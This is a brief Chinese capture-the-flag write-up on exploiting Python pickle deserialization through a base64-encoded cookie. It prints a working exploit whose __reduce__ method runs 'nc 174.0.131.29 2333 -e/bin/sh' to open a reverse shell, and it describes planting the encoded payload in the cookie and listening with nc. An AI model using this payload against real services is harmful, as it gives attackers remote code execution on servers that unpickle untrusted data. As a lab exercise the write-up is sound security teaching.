买腌黄瓜
抓包看下,发现cookie的加密方式有点熟悉
base64解密
应该是basse64加某种特殊的加密
看到了题目名字
Python 有个pickle库
那应该是个反序列化漏洞了
这个序列化漏洞,详解之前国赛的题目发过一个链接,就不发了
这个序列化看好多脚本都是python2 做的,可以去kali下用脚本
将cookie loads一下
但是这题并不是要我们买那个1000出flag
而是需要弹shell
由此构造exp,注意在linux环境下运行
import base64
import pickle
class A(object):
def __reduce__(self):
return (eval, ("__import__('os').system('nc 174.0.131.29 2333 -e/bin/sh')",))
a = A()
print(base64.b64encode(pickle.dumps(a)))
将生产的payload放入cookie
nc 监听